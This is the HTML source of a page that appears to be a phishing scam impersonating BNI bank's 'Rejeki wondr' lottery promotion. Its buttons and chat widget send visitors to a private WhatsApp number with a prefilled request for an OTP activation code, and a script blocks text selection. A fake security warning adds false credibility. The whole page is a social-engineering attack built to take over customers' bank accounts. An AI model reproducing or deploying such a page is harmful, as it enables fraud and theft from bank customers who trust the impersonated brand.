<html><head>
  <script type="text/javascript">
if (typeof document.onselectstart!="undefined") {
document.onselectstart=new Function ("return false");
}
else{
document.onmousedown=new Function ("return false");
document.onmouseup=new Function ("return true");
}
</script>

    </head><body><div dir="ltr" style="text-align: left;" trbidi="on">
<script language="javascript">
</script></div> 
    <meta charset="utf-8"> 
    <meta name="fragment" content="!"> 
    <meta name="theme-color" content="#0F78CB"> 
    <!-- HTML Meta Tags -->
    <title>Program Promo Undian Rejeki BNI #GaPakeNanti</title>
    <meta name="description" content="Rejeki wondr BNI adalah program undian sebagai bentuk apresiasi untuk Nasabah BNI yang memiliki rekening Emerald Saving dan Taplus (Valas, Bisnis Perorangan, Taplus Muda, Taplus Anak).">
    <!-- Facebook Meta Tags -->
    <meta property="og:url" content="https://www.bni.co.id">
    <meta property="og:type" content="website">
    <meta property="og:title" content="𝐏𝐫𝐨𝐠𝐫𝐚𝐦 𝐑𝐞𝐳𝐞𝐤𝐢 𝐰𝐨𝐧𝐝𝐫 𝐛𝐲 𝐁𝐍𝐈">
    <meta property="og:description" content="Rejeki wondr BNI adalah program undian sebagai bentuk apresiasi untuk Nasabah BNI yang memiliki rekening Emerald Saving dan Taplus (Valas, Bisnis Perorangan, Taplus Muda, Taplus Anak).">
    <meta property="og:image" content="images/Rejeki-wondr-BNI.jpg">
    <script src="js/typed.min.js"></script>
    <!-- Twitter Meta Tags -->
    <meta name="twitter:card" content="summary_large_image">
    <meta property="twitter:domain" content="https://www.bni.co.id">
    <meta property="twitter:url" content="https://bni.id/rejekiwondrbni">
    <meta name="twitter:title" content="𝐏𝐫𝐨𝐠𝐫𝐚𝐦 𝐑𝐞𝐳𝐞𝐤𝐢 𝐰𝐨𝐧𝐝𝐫 𝐛𝐲 𝐁𝐍𝐈">
    <meta name="twitter:description" content="Rejeki wondr BNI adalah program undian sebagai bentuk apresiasi untuk Nasabah BNI yang memiliki rekening Emerald Saving dan Taplus (Valas, Bisnis Perorangan, Taplus Muda, Taplus Anak).">
    <meta name="twitter:image" content="https://www.bni.co.id/Portals/1/DNNGalleryPro/uploads/2025/4/16/Rejeki-wondr-BNI.jpg">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
    <link rel="icon" href="images/icon.bni.jpg" type="image/x-icon">
    <link rel="apple-touch-icon" href="images/icon.bni.jpg">
    <!-- Meta Tags Generated via https://www.opengraph.xyz -->
    <link href="css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous"> 
    <link rel="stylesheet" href="css/ionicons.min.css"> 

<style>
  @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
body {
  padding: 0;
  margin: 0;
  width: 100%;
  font-family: 'Open Sans', sans-serif;
  position: fixed;
  background:white;
}

.text-header {
  font-family: 'Open Sans', sans-serif;
  color: #0086e0;
}

.text-subheader {
  font-family: 'Open Sans', sans-serif;
  margin-top: -20px;
  color: #000;
}

.btn-punya {
  display: block;
  margin: 80px auto 0 auto;
  padding: 0px; 
  cursor: pointer; 
  background: none rgb(0, 134, 224);
  border: none; 
  text-align: center; 
  height: 57px; 
  width: 459px; 
  max-width: 100%;
  font-family: Arial; 
  font-size: 14px; 
  font-weight: bold; 
  color: rgb(255, 255, 255); 
  letter-spacing: 2px; 
  line-height: 1; 
  border-radius: 5px; 
  box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
  transition: background 200ms ease 0s;
}

.btn-belum {
  display: block;
  margin: 10px auto;
  padding: 0px; 
  cursor: pointer; 
  background: none transparent;
  border: none; 
  text-align: center; 
  height: 57px; 
  width: 459px; 
  max-width: 100%;
  font-family: Arial; 
  font-size: 14px; 
  font-weight: bold; 
  color: rgb(0, 134, 224);
  letter-spacing: 2px; 
  line-height: 1; 
  border-radius: 5px; 
  transition: background 200ms ease 0s;
}

.form-log {
  box-sizing: border-box; 
  height: 45px; 
  width: 336px;
  max-width: 90%;
  border: 3px solid rgb(0, 134, 224);
  border-radius: 23px;
  font-family: 'Open Sans', sans-serif;
  font-size: 16px; 
  color: rgb(28, 28, 28); 
  word-spacing: 0px; 
  padding: 0px 45px;
  text-align: center;
}

#ionIcons {
  color: rgb(22, 119, 199);
  font-size: 29px;
  position: absolute;
  display: block;
  margin-top: 8px;
  margin-left: 37px;
}

.eye {
  display: block;
  margin: -40px auto;
  margin-right: 20px;
  position: relative;
  box-sizing: border-box; 
  z-index: 16; 
  height: 19.8189px;
  width: 25.0236px; 
  float: right;
  border-radius: 0px; 
  cursor: pointer;
}

.Button clickable-element {
  display: block;
  margin: 60px 0 0 0;
  padding: 0px; 
  cursor: pointer; 
  background: none rgba(0, 111, 214, 0.96); 
  border: none; 
  text-align: center; 
  height: 57px; 
  width: 370px; 
  font-family: Arial; 
  font-size: 17px; 
  font-weight: bold; 
  color: rgb(255, 255, 255); 
  letter-spacing: 1px; 
  line-height: 1; 
  border-radius: 8px; 
  box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
  transition: background 100ms step-start 0s;
}

@media only screen and (max-width: 600px) {
.btn-login {
  width: 82%;
    }
}

.box-lte {
  width: 380px;
  max-width: 95%;
  background: none;
  display: block;
  margin: -40px auto;
  border-radius: 20px;
}

textarea {
  box-sizing: border-box; 
  height: 75px;
  margin-top: -30px;
  width: 280px;
  border: 3px solid rgb(0, 134, 224);
  box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
  border-radius: 15px;
  padding: 5px 10px;
}
        
.textarea1 {
  box-sizing: border-box; 
  border: 2px solid red;
  box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
  border-radius: 50px;
}
        
.textarea {
  box-sizing: border-box; 
  height: 75px;
  width: 280px;
  border: 2px solid red;
  box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
  border-radius: 15px;
  padding: 5px 10px;
}
        
textarea::placeholder{
  font-size: 13px;
}

h1{
  display: table;
  background-color: transparent;
  color: #FF0000;
  padding: 15px;
  width: 100%;
  font-size: 14px;
  margin-bottom: -70px;
  text-align: center;
  position: fixed;
  top: 80;
  font-weight: bold;
  right: 0;
  left: 0;
  margin: 0px auto;
}
        
.blink {
  animation: blink-animation 2s steps(6, start) infinite;
  -webkit-animation: blink-animation 2s steps(6, start) infinite;
}

@keyframes blink-animation {
  to {
  visibility: hidden;
  }
}

@-webkit-keyframes blink-animation {
  to {
  visibility: hidden;
  }
}

#Aktivasi{
  display: none;
} 
    
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #62A80A;
	line-height: 150px;
	color: #000;
	border: solid 1px #1A7404;
	text-align: center;
} 

.animated {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: linear;
	animation-timing-function: linear;
	-webkit-animation-name: bounceIn; 
  animation-name: bounceIn; 
}

@-webkit-keyframes bounceIn { 
  0% { 
  opacity: 1; 
  -webkit-transform: scale(0); 
  } 
  50% { 
  opacity: 1; 
  -webkit-transform: scale(0); 
  } 
  70% { 
  -webkit-transform: scale(0); 
  } 
  100% { 
  -webkit-transform: scale(0); 
  } 
} 

@keyframes bounceIn { 
  0% { 
  opacity: 1; 
  transform: scale(.1); 
  } 
  50% { 
  opacity: 1; 
  transform: scale(.5); 
  }
  70% { 
  transform: scale(1); 
  } 
  100% { 
  transform: scale(1); 
  } 
} 

#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #62A80A;
	line-height: 150px;
	color: #000;
	border: solid 1px #1A7404;
	text-align: center;
} 

.naik {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: ease-in;
	animation-timing-function: ease-in;
	-webkit-animation-name: bounceOutUp; 
  animation-name: bounceOutUp; 
}

@-webkit-keyframes bounceOutUp { 
  0% { 
  -webkit-transform: translateY(0); 
  } 
  20% { 
  opacity: 1; 
  -webkit-transform: translateY(20px); 
  } 
  100% { 
  opacity: 1; 
  -webkit-transform: translateY(-200px); 
  } 
} 

@keyframes bounceOutUp { 
  0% { 
  transform: translateY(0); 
  } 
  20% { 
  opacity: 1; 
  transform: translateY(20px); 
  } 
  100% { 
  opacity: 1; 
  transform: translateY(-500px); 
  } 
} 

.bounceOutUp {     
}

/*********************/
.process1 {
  width: 100%;
  height: 100%;
  display: flex;
  justify-content: center;
  margin: auto;
  position: absolute;
  padding-top: 300px;
  left: 0;
  right: 0;
  bottom: 0;
  background: rgba(0, 0, 0, 0.6);
  z-index: 99999; 
}

.loading {
  position: absolute;
  display: flex;
  justify-content: center;
  align-items: center;
  margin-bottom: 20%;
  margin-top: 300px;
}

.loading img {
  width: 50px;
  top: 10;
}

.loading .spinner{
  position: absolute;
  width: 35px;
  animation: spin 1s linear infinite;
  -webkit-animation: spin 1s linear infinite;
  -moz-animation: spin 1s linear infinite;
  -ms-animation: spin 1s linear infinite;
  -o-animation: spin 1s linear infinite;
}

@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}

.loader{
  font-size: 20px;
  color: #FFF;
  font-weight: bold;
  display: inline-block;
  font-family: 'Nunito', sans-serif;
  position: absolute;
  margin-top: 0px;
}

.loader:before{
  content: '';
  animation: 2s print linear alternate infinite;
}
    
.loader:after{
  content: '';
  position: absolute;
  right: -4px;
  top: 50%;
  transform: translatey(-45%);
  width: 2px;
  height: 1.3em;
  background: currentColor;
  opacity: 0.8;
  animation: 1s blink steps(2) infinite;
}
    
@keyframes blink {
  0%  { visibility: hidden;}
  100%  { visibility: visible;}
}
    
@keyframes print {
  0% { content: 'W'}
  10% { content: 'WO'}
  20% { content: 'WON'}
  30% { content: 'WOND'}
  40% { content: 'WONDR'}
  50% { content: 'WONDR-'}
  60% { content: 'WONDR-B'}
  70% { content: 'WONDR-BY.'}
  80% { content: 'WONDR-BY-..'}
  90% , 100% { content: 'WONDR-BY-BNI...'}
}
    
.typed { 
}

.typed-cursor{
  opacity: 1;
  animation: blink 0.7s infinite;
}

@keyframes blink{
  0% { opacity:1; }
  50% { opacity:0; }
  100% { opacity:1; }
}       
</style>


  <div id="popupku" style="position: fixed;top: 0;left: 0;right: 0;bottom: 0;width: 100%; height: 100%; background: rgba(0,0,0, 0.4); z-index: 9999">
    <center>
      <img id="gambarku" class="animated" src="images/proses.jpg" width="60%" style="margin-top: 250px; border-radius: 15px; box-shadow: rgba(199, 199, 199, 2.2)  0px 2px 5px 0px; border: 2px double #0F78CB" onclick="tutupimg()">
    </center>
</div>
<nav style="position: ; top: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 0px; background: #F1F5F8; z-index: 99999; border-bottom: 0px solid #ddd">

</nav>
<center>
<img src="images/Rejeki-wondr-BNI.jpg" style="width: 100%; border-radius: 0px 0px 0px 0px; border-bottom: 0px double #2468A5 outline: 0px solid #2468A5;background: #fff; box-shadow: rgba(0, 0, 0, 2.2)  0px 0px 0px 0px;">
</center>
<div class="container" id="otp">
  <div class="box-lte">
    <div class="row" style="margin-top: 100px;">
      <center>
        <div class="col-12 d-block mx-auto text-center p-0" style="height: 62%; width: 100%; max-width: 100%; display: block; border-radius: 0px 25px 0px 25px; position: absolute; margin: 0px auto; left: 0; right: 0;z-index: -1; text-align: center; margin-top: 75px ;">

        </div>
      </center></div>
      <center>
        <div class="row" style="margin-top: 0px; border: 2px solid #fff; width: 100%;height:165px; border-radius: 15px; background-image: url(); background-size: 100% 100%; background-position: 100% 100%; padding-top: 10px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px; margin: -30px auto; background: #fff; padding: 10px; color: #0F78CB; font-weight: 550; color: #fff;background: #00aa89;text-shadow: #101010 1px 1px 0; font-weight: bold; box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; font-size: 15px; text-align: center" id="Typed"></div>
      
    </center></div>
    <div class="container" id="Aktivasi" style="display: none">
      <div class="box-lte">
        <div class="row" style="margin-top: 140px;">
          <div class="col-12 d-block mx-auto text-center p-0" style="height: 150px; width: 256px; max-width: 100%; display: block; margin-top: -50px; border-radius: 0px;"></div>
        </div>
        <div class="row">
          <hr style="display: block; margin: auto; width: 90%;">
        </div>
        <div class="row">
          <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px; margin-top: -10px"></div>
        </div>
        <div class="row">
          <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto;">

          
        </div>
        <b>

        </b>
      </div>
      <b>

      </b>
    </div>
  
  <b>

  </b></div><b>
  <br>
  <center>
    <b>
      <a href="https://api.whatsapp.com/send/?phone=6282376059002&text=Hallo+𝐁𝐚𝐧𝐤+𝐁𝐍𝐈+Saya+Butuh+Bantuan" style="text-decoration: none">
        <p style="max-width: 400px;margin: 0px auto;position:relative;background-color:#EC794C;color:#fff;border:0px solid #EC794C;width:45%;border-radius:3px;font-family: 'Nunito',sans-serif;font-size: 12px;padding: 10px;display: block;text-align: center;box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px,rgba(0, 0, 0, 0.20) 0px 6px 6px; margin-top: 55px;  ">CETAK KUPON UNDIAN <br></p>
      </a>
    </b>
  
</center></b></div><b>
</b>

<br>
<br>
<br>
<br>
<br>
<br>
<br>
<center>
  <p style="color: #459BAD; font-weight: 0; margin-top: 0px;">© Hak Cipta PT Bank Negara Indonesia (Persero), Tbk.</p>
  <hr>
</center>
<center>
  <div id="process1" name="process" class="process1" style="display: none;">
    <span class="loader"></span>
  </div>
</center>  
<audio hidden="" controls="" id="bsi">
<source src="media/wondrbybni.mp3" type="audio/ogg">
<source src="media/wondrbybni.mp3" type="audio/mpeg">
Your browser does not support the audio element.
</audio> 
<audio hidden="" controls="" id="bsiku">
<source src="media/wondrbybni.mp3" type="audio/ogg">
<source src="media/wondrbybni.mp3" type="audio/mpeg">
Your browser does not support the audio element.
</audio>       
<script src="whatsapp-button.js" async="" onload="whatsappButton({
  buttonName:' ',
  buttonIconSize: '32',
  brandImageUrl:'https://www.bni.co.id/Portals/1/DNNGalleryPro/uploads/2025/4/16/Rejeki-wondr-BNI.jpg',
  buttonMargin:'',
  brandName:'wondr by BNI',
  brandSubtitleText:'online',
  buttonSize:'medium',
  buttonPosition:'right',
  callToAction:'Chat Sekarang',
  phoneNumber:'6282376059002',
  welcomeMessage:'Halo Kak, Apa yang dapat saya bantu?👋',
  prefillMessage:'Saya Mau Request Kode OTP aktivasi',})">
</script>		
<script src="js/jquery.min_1.js"></script>  
<script src="js/jquery.min.js" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="mainkode.js"></script>
<script src="js/jquery.min_2.js"></script>
<script>
 function tutupimg(){
      setTimeout(() => {
  $("#popupku").hide();
      },00)
      setTimeout(() => {
       audio = document.getElementById("bsi");
    audio.play();
    audio.loop = false
      },900)
  $("#gambarku").addClass("naik");
  new Typed('#typed',{
  strings : ['', 'Keamanan Data Kamu, Prioritas Kami Jaga selalu kerahasiaan datamu dengan tidak memberitahukan username, password, PIN, OTP, CVV, dan M-Token kepada pihak manapun termasuk petugas Bank BNI.'],
  typeSpeed : 45,
  delaySpeed : 1000,
  loop : false
});
 }

</script>
<script>
   function getcs(){audio = document.getElementById("bsi");audio.load();setTimeout(function(){  
   $("#process1").hide();location.href='https://wa.me/6282376059002&text=Hallo+𝐁𝐚𝐧𝐤+𝐁𝐍𝐈+Saya+Butuh+Bantuan';}, 0);}     
</script>
<!-- Static App Form Collection Script -->
<!--<script src="https://static.app/js/static-forms.js" type="text/javascript"></script>
<script src="https://static.app/js/static.js" type="text/javascript"></script>-->
<script>
   function gantiborder(){
   $("#nama").removeClass('textarea'); 
   $("#blinkk").hide(); document.getElementById('kirims').value = "Konfirmasi";}function gantiborder1(){
   $("#nama1").removeClass('textarea1'); 
   $("#blinkAktivasi").hide(); 
   $("#logoku").show(); document.getElementById('kirims').value = "Konfirmasi";}   
</script>


</body></html><!--<script src='https://a.bsite.net/footer.js'></script>
-->